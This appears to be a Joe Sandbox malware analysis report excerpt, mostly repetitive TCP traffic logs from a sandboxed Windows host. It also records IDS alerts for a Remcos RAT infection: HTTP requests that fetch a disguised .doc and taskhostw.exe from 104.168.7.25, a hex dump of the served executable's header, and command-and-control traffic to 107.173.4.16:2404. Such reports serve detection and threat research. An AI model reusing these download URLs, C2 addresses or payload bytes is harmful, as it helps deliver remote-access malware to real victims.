                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
                Source: global trafficTCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 104.168.7.25:80 -> 192.168.2.22:49170
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49171 -> 107.173.4.16:2404
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 107.173.4.16:2404
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 104.168.7.25:80 -> 192.168.2.22:49170
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: geoplugin.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.173.4.16 2404Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
                Source: Malware configuration extractorURLs: 107.173.4.16
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 107.173.4.16:2404
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 12 Oct 2024 14:39:56 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 12 Oct 2024 07:42:35 GMTETag: "13b200-62442bf48212e"Accept-Ranges: bytesContent-Length: 1290752Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 28 0a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d0 0a 00 00 00 00 00 4a 7f 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 14 00 00 04 00 00 0e 4e 14 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 3c 28 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 13 00 30 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2e dd 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3c 28 07 00 00 70 0c 00 00 2a 07 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 30 71 00 00 00 a0 13 00 00 72 00 00 00 40 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49173 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /7al0eY HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: shuvi.ioConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /450/taskhostw.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49166 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
                Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.25
